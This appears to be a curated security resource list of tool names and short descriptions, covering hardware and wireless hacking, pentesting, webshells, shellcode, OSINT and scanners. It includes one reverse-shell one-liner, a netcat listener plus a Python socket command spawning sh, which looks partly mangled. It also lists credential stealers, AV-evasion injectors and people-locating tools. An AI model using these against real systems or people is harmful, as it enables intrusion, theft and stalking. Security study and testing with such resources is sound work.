HammerKit 78 over 3 years ago : HammerKit is an open-source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms
Evil Logitech erm I ment USB cable
Hacker's guide to deep-learning side-channel attacks: the theory . : Side Channel Attacks Assisted with Machine Learning
Guarding Against Physical Attacks: The Xbox One Story
Common BMC vulnerabilities and how to avoid repeating them ,

CSIRT / Archs / Hardware / Blutetooth:

BLEAH 1,097 almost 6 years ago : A BLE scanner for "smart" devices hacking
BrakTooth : Causing Havoc on Bluetooth Link Manager
Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
The Practical Guide to Hacking Bluetooth Low Energy
A Practical Guide to BLE Throughput
Exploiting IoT enabled BLE smart bulb security

CSIRT / Archs / Hardware / Wireless / Wifi:

ESP8266 Deauther Version 2 13,512 3 months ago : Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners!
Airspy-Utils 13 about 1 year ago : is a small software collection to help with firmware related operations on Airspy HF+ devices
infernal-twin 1,236 about 2 years ago : wireless hacking - This is automated wireless hacking tool
Cracking WiFi at Scale with One Simple Trick
hcxdumptool 1,837 11 days ago : small tool to capture packets from wlan devices

CSIRT / Archs / Hardware / Drone:

SkyJack is a drone engineered to autonomously seek out, hack, and wirelessly take over other drones within wifi distance, creating an army of zombie drones under your control
eaphammer 2,194 2 months ago : Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks
whereami 5,118 12 months ago : Uses WiFi signals and machine learning to predict where you are

CSIRT / Archs / Hardware / Car Hacking:

Car hijacking swapping a single bit
Hacking a VW Golf Power Steering ECU Part 1, and

CSIRT / Archs / Hardware / Internet of Things (IoT):

BMC-Tools 479 12 months ago : RDP Bitmap Cache parser
Hacking Printers Wiki
Full key extraction of NVIDIA™ TSEC

CSIRT / Archs / Hardware

The x86 architecture is the weirdo, part 2
awesome flipper 18,960 about 2 months ago : 🐬 A collection of awesome resources for the Flipper Zero device
Dark Flipper 17,564 11 days ago : Flipper Zero Unleashed Firmware
My Flipper Shits 1,170 24 days ago : Free and libre source BadUSB payloads for Flipper Zero. [Windows, GNU/Linux, iOS]
Reverse Engineering Yaesu FT-70D Firmware Encryption
Reverse-engineering an airspeed/Mach indicator from 1977
Stepping Insyde System Management Mode : Intel’s Alder Lake BIOS source code was

CSIRT / Archs / ARM / Arm Heap Exploitation, by Azeria:

AZM Online Arm Assembler
Understanding the Glibc Heap Implementation Part 1:
Understanding the GLIBC Heap Implementation Part 2:
Heap Exploit Development – Case study from an in-the-wild iOS 0-day

CSIRT / Archs / ARM

ARM64 Reversing and Exploitation by :

CSIRT / Archs / ARM / ARM64 Reversing and Exploitation

ARM Instruction Set + Simple Heap Overflow Part 1 -
Use After Free Part 2 -
A Simple ROP Chain Part 3 -

CSIRT / Pentesting

Awesome Penetration Testing 21,934 28 days ago : A collection of awesome penetration testing resources, tools and other shiny things
Seclists 58,517 7 days ago is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place
osquery Search operating systems on the network:
osquery Across the Enterprise
fleet 3,118 6 days ago : The premier osquery
Intrusion Detection Penetration Testing Cheat Sheet For Windows Machine –

CSIRT / Pentesting / Zero Day Zen Garden:

Part 0 Windows Exploit Development -
Part 1 Windows Exploit Development -
Part 2 Windows Exploit Development -
Part 3 Windows Exploit Development -
Part 4 Windows Exploit Development -

CSIRT / Pentesting

Got Meterpreter? PivotPowPY!
Pentest Tips and Tricks
Script to steal passwords from ssh. 477 almost 6 years ago
Network Infrastructure Penetration Testing Tool 1,618 over 3 years ago
tcp connection hijacker 463 23 days ago
"EAST" PENTEST FRAMEWORK
Pown.js 259 over 1 year ago : is the security testing an exploitation framework built on top of Node.js and NPM
Sandmap 1,578 almost 2 years ago is a tool supporting network and system reconnaissance using the massive Nmap engine
trackerjacker 2,636 10 months ago : Like nmap for mapping wifi networks you're not connected to, plus device tracking
TIDoS-Framework 1,782 over 1 year ago : The offensive web application penetration testing framework
GitMiner 2,092 about 4 years ago : Tool for advanced mining for content on Github
DHCPwn 667 over 6 years ago : All your IPs are belong to us
badKarma 418 almost 6 years ago : advanced network reconnaissance toolkit
Danger-zone 674 over 4 years ago : Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files
go-tomcat-mgmt-scanner 28 almost 5 years ago : A simple scanner to find and brute force tomcat manager logins
IoTSecurity101 2,726 about 1 month ago : From IoT Pentesting to IoT Security
IoT Pentesting and : A Virtual environment for Pentesting IoT Devices
red_team_telemetry 98 almost 6 years ago
SharpSploitConsole 178 almost 3 years ago : SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit
CrackMapExec 8,453 12 months ago : A swiss army knife for pentesting networks
DarkSpiritz : A penetration testing framework for Linux, MacOS, and Windows systems
proxycannon-ng 610 almost 2 years ago : A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
PentestHardware 492 over 5 years ago : Kinda useful notes collated together publicly
MarkBaggett’s gists : This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation
Serverless Toolkit for Pentesters
pentest_scripts 137 about 5 years ago : scrapes linkedin and generates emails list
Penetration Testing Tools Cheat Sheet ∞ : Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test
IVRE : Network recon framework ( )
DomainInformation 0 almost 6 years ago (pt-br) : Tool para a identificação de arquivos, pastas, servidores DNS, E-mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
Spawning a TTY Shell : Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system
LeakLooker : Find Open Databases in Seconds
pown-recon 421 about 2 years ago : A powerful target reconnaissance framework powered by graph theory
Micro8 18,046 over 3 years ago : The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source
Payloads All The Things 61,337 9 days ago : A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
Penetration Test Guide based on the OWASP + Extra 2,478 over 2 years ago : This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 15 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty

CSIRT / Pentesting / Penetration Test Guide based on the OWASP + Extra

Insecure Direct Object References 2,478 over 2 years ago (OTG-AUTHZ-004)

CSIRT / Pentesting

pentesting tool for finding vulnerabilities in web applications OWASP ZAP w2019-10-14 released:
Order of the Overflow Proxy Service 13 over 5 years ago
liffy 789 over 1 year ago : Local file inclusion exploitation tool
foxyproxy.json : Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
pentest_compilation 1,324 almost 2 years ago : Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios
Linux for Pentester : ZIP Privilege Escalation
Presentation Clickers 96 about 5 years ago : Keystroke injection vulnerabilities in wireless presentation clickers
postwoman 65,598 4 days ago : alien API request builder - A free, fast, and beautiful alternative to Postman

CSIRT / Pentesting / Better API Penetration Testing with Postman:

Part 1
Part 2
Part 3
Part 4

CSIRT / Pentesting

DNS and DHCP Recon using Powershell
SiteBroker 417 6 months ago : A cross-platform python based utility for information gathering and penetration testing automation!
PENTESTING-BIBLE 12,914 over 1 year ago : This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources
Nikto 8,623 6 days ago : web server scanner
Nikto: A Practical Website Vulnerability Scanner
NetAss2 :
CSS Injection Primitives
physical-docs 472 about 5 years ago : This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments
pentest-tools 3,152 over 1 year ago : Custom pentesting tools
HACKING WITH ENVIRONMENT VARIABLES : Interesting environment variables to supply to scripting language interpreters
rootend 146 about 3 years ago : A *nix Enumerator & Auto Privilege Escalation tool
DroneSploit 1,443 about 1 year ago : Drone pentesting framework console
HAck Tricks ( ): Here you will find the typical flow that you should follow when pentesting one or more machines
Huawei_Thief 26 about 4 years ago : Huawei DG8045 & HG633 Devices Exploitation Tool
urldozer 29 over 4 years ago : Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s])
Pentesting Cheatsheets
Snaffler 2,133 20 days ago : a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )
Several ways to download and execute malicious codes (LOLBAS)

CSIRT / Pentesting / Several ways to download and execute malicious codes (LOLBAS)

coregen.exe

CSIRT / Pentesting

Jok3r 1,030 6 months ago : Network and Web Pentest Automation Framework
Penetration Testing Cheat Sheet 660 4 days ago
BBT 1,720 8 months ago Bug Bounty Tools
P4wnP1 A.L.O.A. 3,775 about 1 year ago by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance"
AriaCloud 133 over 3 years ago : A Docker container for remote penetration testing
RustScan 14,669 10 days ago : The Modern Day Port Scanner
Impacket 13,551 29 days ago : is a collection of Python classes for working with network protocols
fiddler : Capturing web traffic logs
SecLists 58,517 7 days ago : is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more
21 - Pentesting FTP
PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained
post-exploitation 1,554 over 4 years ago : Post Exploitation Collection
Proxyjump, the SSH option you probably never heard of
GLORP 249 2 months ago : A CLI-based HTTP intercept and replay proxy
Sec4US's cheatsheets : a lot of about shellcoding and bufferoverflow
Pentesting 101: Working With Exploits
SMB AutoRelay 47 almost 4 years ago : SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments
Decoder++ 101 8 months ago : An extensible application for penetration testers and software developers to decode/encode data into various formats
SCShell 1,400 over 1 year ago : Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
bulwark 180 4 days ago : An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports
A Noob Guide to setup your Own OOB DNS Server : : A Bind9 server for pentesters to use for Out-of-Band vulnerabilities
Interactsh 3,445 4 days ago : An OOB interaction gathering server and client library
DNSLOG 4 almost 5 years ago : dnslog dns / dns rebinding platform
Pre-engagement
pentest, should I do it?
White Box Penetration Testing: “Cheating” in order to boost impact and value
Weird Proxies 1,780 about 1 year ago : Reverse proxies cheatsheet
Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal.
pwncat 1,793 about 2 years ago : netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
From Python to .Net
offensiveph 329 about 3 years ago : use old Process Hacker driver to bypass several user-mode access controls
Penetration Testing - An Introduction by cirl.lu
mitmproxy 36,838 8 days ago :
Poor Man's Pentest 551 over 3 years ago : This a collection of the code that I have written for the Poor Man's Pentest presentation
Operator's Decalogue
LOTS Living Off Trusted Sites ( ) Project: Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain
Filesec.io : Stay up-to-date with the latest file extensions being used by attackers
EMBArk 321 3 months ago : The firmware security scanning environment
EMBA 2,700 5 days ago : The security analyzer for embedded device firmware
OffensiveNim 2,840 6 months ago : My experiments in weaponizing Nim
White Box Penetration Testing: “Cheating” in order to boost impact and value
Python Penetration Testing Cheat Sheet

CSIRT / Pentesting / Reconnaissance

Automated Reconnaissance Pipeline 428 almost 2 years ago : An automated target reconnaissance pipeline
PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
subfinder 10,277 11 days ago is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing
urlhunter 1,512 about 1 year ago : a recon tool that allows searching on URLs that are exposed via shortener services
URLBrute 48 almost 4 years ago : Directory/Subdomain scanner developed in GoLang
degoogle 494 over 2 years ago : search Google and extract results directly. skip all the click-through links and other sketchiness
Investigator 254 about 1 year ago : An online handy-recon tool

CSIRT / Pentesting / Enumeration

linux-smart-enumeration 3,443 11 months ago : Linux enumeration tool for pentesting and CTFs with verbosity levels
Ethical Hacking Course: Enumeration Theory
Sublist3r 9,875 4 months ago : Fast subdomains enumeration tool for penetration testers
subscraper 822 5 months ago : External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps
massh-enum 146 about 5 years ago : OpenSSH 7.x Mass Username Enumeration
LinEnum 7,032 about 1 year ago : Scripted Local Linux Enumeration & Privilege Escalation Checks
linpostexp 176 over 4 years ago : Linux post exploitation enumeration and exploit checking tools
Social Mapper A Social Media Enumeration & Correlation Tool
The art of subdomain enumeration 639 almost 6 years ago : This repository contains all the supplement material for the book "The art of sub-domain enumeration"
social_mapper 3,808 over 2 years ago : A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
LEGION 877 about 1 year ago Automatic Enumeration Tool
discover 3,444 about 2 months ago Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit
Z/OS System Enumeration Scripts 63 18 days ago : PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL
WPExploitation 0 11 months ago : simples scripts to help windows enumeration
CTFR 1,972 11 months ago does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs
feroxbuster 5,954 2 months ago : A fast, simple, recursive content discovery tool written in Rust
grinder 290 over 3 years ago : Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
Admin-Scanner 157 almost 4 years ago : This tool is to design to find admin panel of websites
Virtual host scanner 665 almost 7 years ago : A script to enumerate virtual hosts on a server
vhost-brute 84 almost 2 years ago : A PHP tool to brute force vhost configured on a server
grab_beacon_config 446 over 3 years ago : nmap strip to get beacon info
assetfinder 3,045 6 months ago : Find domains and subdomains related to a given domain

CSIRT / Pentesting / Enumeration / Wordlists:

hackerone_wordlist 0 about 1 year ago : The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform
paths wordlists
subdomains wordlists
parameters wordlists
How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
Assetnote Wordlists : When performing security testing against an asset, it is vital to have for content and subdomain discovery
Duplicut 881 over 2 years ago : Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking)
Weakpass rule-based online generator to create a wordlist based on a set of words entered by the user. is a distributed password brute-force system that focused on easy use
Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords. 1,548 over 2 years ago
Default IoT Username/password
Elpscrk 788 about 1 month ago : An Intelligent wordlist generator based on user profiling, permutations, and statistics. (Named after the same tool in Mr.Robot series S01E01)

CSIRT / Pentesting / Enumeration

Ghost Eye 270 about 2 years ago Informationgathering Footprinting Scanner and Recon Tool Release. Ghost Eye is an Information Gathering Tool I made in python 3. To run Ghost Eye, it only needs a domain or ip. Ghost Eye can work with any Linux distros if they support Python 3. Author: Jolanda de Koff
SuperEnum 19 about 8 years ago : This script does the basic enumeration of any open port along with screenshots
Domain Dossier : The Domain Dossier tool generates reports from public records about domain names and IP addresses to help solve problems, investigate cybercrime, or just better understand how things are set up
X41 BeanStack : Java Fingerprinting using Stack Traces
Skanuvaty 886 over 2 years ago : Dangerously fast DNS/network/port scanner
TireFire 148 11 days ago : Automate the scanning and enumeration of machines externally while maintaining complete control over scans shot to the target. Comfortable GUI-ish platform. Great for OSCP/HTB type Machines as well as penetration testing
OS Fingerprinting using NTP

CSIRT / Pentesting / WebShells

novahot 295 7 months ago :A webshell framework for penetration testers
Weevely 3,200 about 1 month ago : Weaponized web shell
Did you know that Python's simple web server can run CGI scripts
Web-Shells 167 almost 10 years ago : (mostly php)

CSIRT / Pentesting / ShellCodes

Why is My Perfectly Good Shellcode Not Working? : Cache Coherency on MIPS and ARM
shellcode2asmjs 36 over 6 years ago : Automatically generate ASM.JS JIT-Spray payloads
Shellen 891 over 3 years ago :Interactive shellcoding environment to easily craft shellcodes
C-S1lentProcess1njector : Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage

CSIRT / Pentesting / ShellCodes / Windows:

Unicorn 3,736 10 months ago is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory
pe_to_shellcode 2,374 over 1 year ago : Converts PE into a shellcode
stager.dll 170 over 4 years ago : Code from this
ThreadBoat 173 4 months ago : Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
Excel4-DCOM 321 over 5 years ago : PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
MaliciousMacroMSBuild 494 over 5 years ago : Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass
SnapLoader : Injecting shellcode into 'ntdll.dll' address space in target process, and hijacking its thread without calling GetThreadContext, evading memory scanners, and more

CSIRT / Pentesting / ShellCodes / Linux:

Linux x86 Reverse Shell Shellcode
mem-loader.asm : Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by

CSIRT / Pentesting / ShellCodes

Shellab : Linux and Windows shellcode enrichment utility
ShellcodeWrapper 434 almost 8 years ago : Shellcode wrapper with encryption for multiple target languages
Fully (auto) interactive TTY shells

CSIRT / Pentesting / ShellCodes / Reverse Shell:

I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) : nc -lnvp 1234 / python3 -c "# 107, single statement, non-blocking ("subprocess").Popen("sh",0,None,*[ ("socket").create_connection(("127.0.0.1",1234))] [ socket.create_connection(("127.0.0.1",1234))]*3)"
python-pty-shells 740 over 10 years ago : Python PTY backdoors - full PTY or nothing!
Powershell HTTP/S Reverse Shell 595 3 months ago : Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware
HTTP/S Asynchronous Reverse Shell 264 about 3 years ago : (POC) Asynchronous reverse shell using the HTTP protocol
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
Reverse Shell Cheat Sheet
Reverse Shell Generator
How to Execute Shell Commands with Python
Reverse Shell to fully interactive
Single-Line Web Shell
Simple-Backdoor-One-Liner.php
reverse shell
Spawning reverse shells
Spawning interactive reverse shells with TTY
Reverse Shell Cheat Sheet
shellver 289 over 4 years ago : Reverse Shell Cheat Sheet TooL
GTRS 616 about 1 month ago : GTRS - Google Translator Reverse Shell
Using tmux for automating interactive reverse shells

CSIRT / Pentesting / ShellCodes

USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
Usando a pwntools para Binary Exploitation (pt-br)
CallObfuscator 981 almost 4 years ago : Obfuscate specific windows apis with different apis
vba-obfuscator 150 about 3 years ago : 2018 School project - PoC of malware code obfuscation in Word macros
ProcessInjection 1,076 about 1 year ago : This program is designed to demonstrate various process injection techniques
Ten process injection techniques: A technical survey of common and trending process injection techniques
shellcoding using env variables
From a C project, through assembly, to shellcode
Writing and Compiling Shellcode in C
Using ICMP to deliver shellcode
Buffer Overflow Windows - EGGHUNTER cheatsheet
metasploit, x86/alpha_mixed and Windows 7 are killing me
Some lessons learned along the way to Buffer Overflow
Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1
Resolving API addresses in memory
Locating Kernel32 Base Address
Finding Kernel32 Base and Function Addresses in Shellcode
Basics of Windows shellcode writing
Shellcodes database for study cases
Return Oriented Programming (ROP) Attacks

CSIRT / Pentesting / ShellCodes / Gadgets:

ROPgadget Tool 3,944 about 2 months ago
RETURN ORIENTED PROGRAMMING (ROP)
ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes
one_gadget 2,070 20 days ago : The best tool for finding one gadget RCE in libc.so.6
JOP ROCKET 100 3 months ago : The Jump-oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment

CSIRT / Pentesting / ShellCodes

A fun trick for running shellcode directly from bash
Polyglot Assembly : Writing assembly code that runs on multiple architectures
Shellcode Injection Techniques 447 about 3 years ago : A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV
Simple Shellcode Tale!
Linux x86 execve("/bin/sh") - 28 bytes
ShellCode Tester 90 16 days ago : An application to test windows and linux shellcodes
Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
Core 43 about 3 years ago : Core bypass Windows Defender and execute any binary converted to shellcode
Encontrando endereço da função dinamicamente. Análise da biblioteca block_api (pt-br)
Ninja UUID Shellcode Runner 433 over 1 year ago : Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!
IPFuscator 352 10 months ago : A tool to automatically generate alternative IP representations
Shellcode Mutator 233 almost 2 years ago : Mutate nasm assembly source files using no-instruction sets (such as nops) to avoid signatures

CSIRT / Pentesting / Reporting

public-pentesting-reports 8,498 6 months ago . Curated list of public penetration test reports released by several consulting firms and academic security groups
report-ng 66 10 months ago : Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base
PandocPentestReport 10 about 5 years ago : This repository shows my effort to create a pandoc based pentest report template
Technical Report template 2 over 9 years ago : LaTeX template for technical reports
TryHackMe. Breaking Into the Kenobi Machine.
PwnDoc : is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report
This is how you can deliver true value through your pentest reports
Offensive Security Exam Report Template in Markdown 3,558 21 days ago : Markdown Templates for Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP exam report
A List of Post-mortems! 11,309 4 months ago : A collection of postmortems. Sorry for the delay in merging PRs!

CSIRT / Pentesting / OSINT - Open Source INTelligence

Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19. 61 almost 7 years ago
OSINT tool for visualizing relationships between domains, IPs and email addresses.
sn0int 2,058 about 2 months ago : Semi-automatic OSINT framework and package manager
OSINT – Passive Recon and Discovery of Assets A Pentester’s Guide – Part 1:
OSINT – LinkedIn is Not Just for Jobs A Pentester’s Guide - Part 2:
iKy : I Know You (OSINT project)
Gitrob 5,938 about 2 years ago : Putting the Open Source in OSINT
OSint Tools : On this page you’ll find tools which you can help do your OSINT reseach
datasploit 3,032 over 4 years ago : An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats
the-endorser 327 over 3 years ago : An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills
OSINT-y Goodness : HathiTrust Digital Library
OSINT Resources for 2019
Awesome OSINT 19,100 12 days ago : 😱 A curated list of amazingly awesome OSINT
Directory of Open Access Journals OSINT-y Goodness, №14 -
Identifying A Pro-Indonesian Propaganda Bot Network Twitter Analysis:
TWINT 15,833 over 1 year ago : An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations
Breaking Mimblewimble’s Privacy Model : Mimblewimble’s privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% Grin transactions in real time
snscrape 4,490 about 1 year ago : A social networking service scraper in Python
ꓘamerka GUI Hack the planet with — Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. , . ICS/IoT search:
dmi-tcat 367 16 days ago /Digital Methods Initiative - Twitter Capture and Analysis Toolset
KnockKnock 181 over 1 year ago : A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes
From email to phone number, a new OSINT approach
recox 318 6 months ago : Master script for web reconnaissance
openSquat 729 4 months ago is an opensource Intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams
Trace Labs Kali Linux build configuration 680 over 1 year ago :
natlas 626 4 months ago : Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned
sifter : is a osint, recon & vulnerability scanner. It combines a plethara of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within microsft and if unpatched, exploit them
Kitsune 242 over 2 years ago : An artificial neural network to detect automated Twitter accounts (bots)
Image "Cloaking" for Personal Privacy
OSINT-Brazuca 1,636 about 2 months ago (pt-br) : Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil
WhatsMyName : This tool allows you to enumerate usernames across many websites

CSIRT / Pentesting / OSINT - Open Source INTelligence / WhatsMyName

Maltego Transforms for WhatsMyName 63 over 1 year ago

CSIRT / Pentesting / OSINT - Open Source INTelligence

shadowbanned : Shadowban Tester for Twitter
sherlock 60,468 8 days ago : Hunt down social media accounts by username across social networks
usufy 7 almost 10 years ago is a GPLv3+ piece of software that checks the existence of a profile for a given user in a bunch of different platforms. It uses the error messages displayed by most platforms when a user profile has not been found as the evidence of the existence or not of a given profile
osrf 928 7 months ago : OSRFramework, the Open Sources Research Framework is a AGPLv3+ project by i3visio focused on providing API and tools to perform more accurate online researches
IntelMQ : A tool-suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs
OSINT SAN Framework. (ru) : OSINT-SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills
Scrummage 512 about 1 year ago : The Ultimate OSINT and Threat Hunting Framework
viper 3,745 about 2 months ago : Intranet pentesting tool with webui 开源图形化内网渗透工具
⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾ 815 5 months ago is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework)
3WiFi : Free Wireless Database
Stealth plane in flight
ExportData Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations
DetectDee 1,289 about 1 year ago : Hunt down social media accounts by username, email or phone across social networks
OSINT framework focused on gathering information from free tools or resources
h8mail 4,187 over 1 year ago : Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
PwnBin 427 about 3 years ago : Python Pastebin Webcrawler that returns list of public pastebins containing keywords
ODBParser : OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories
pastego 97 almost 3 years ago : Scrape/Parse Pastebin using GO and expression grammar (PEG)
Instagram Scraper : Scrapes an instagram user's photos and videos
galer 253 10 days ago : A fast tool to fetch URLs from HTML attributes by crawl-in
How to bypass CloudFlare bot protection ?
SpyScrap 169 12 months ago : CLI and GUI for OSINT. Are you very exhibited on the Internet? Check it! Twitter, Tinder, Facebook, Google, Yandex, BOE. It uses facial recognition to provide more accurate results.F
pwnedOrNot 2,239 about 1 year ago OSINT Tool for Finding Passwords of Compromised Email Addresses
dorking (how to find anything on the Internet)
Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing
The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target.
DorkGenius : Generate custom dorks for Google, Bing, DuckDuckGo, & more!
chatter 146 over 1 year ago : internet monitoring osint telegram bot for windows
Slackhound 74 9 months ago : Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects
ail-feeder-telegram 13 10 days ago : External telegram feeder for AIL framework
MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
signald : unofficial daemon for interacting with Signal
Telegram messenger CLI 386 over 2 years ago : for Telegram IM
TelegramScraper 42 about 4 years ago : Telegram scraping tool for researching mis-/disinformation and investigating shade goings on
OSINT-Discord-resources 347 8 months ago : Some OSINT Discord resources

CSIRT / Pentesting / Vulnerability

Striker 2,234 over 1 year ago is an offensive information and vulnerability scanner
SQL Vulnerability Scanner 975 almost 7 years ago
Decentralized Application Security Project ,
Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
Beating the OWASP Benchmark
CMSScan 964 over 3 years ago : Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues
Meteor Blind NoSQL Injection
Security Bulletins that relate to Netflix Open Source 742 about 2 months ago
tsunami-security-scanner 8,274 2 months ago : Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence
Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners ,
New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service . allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website. . video:
openVulnQuery 29 over 1 year ago : A Python-based client for the Cisco openVuln API
HellRaiser 562 over 1 year ago : Vulnerability Scanner
Open-Source Vulnerability Intelligence Center : - Vulnerability Intelligence Center / Exploits
Vagrant GVM/Openvas 4 over 3 years ago : GVM/Openvas vulnerability scanner in Alpine with Vagrant
How to Have a Cybersecurity Graph Database on Your PC
On the Security Vulnerabilities of Text-to-SQL Models

CSIRT / Pentesting / WAFs

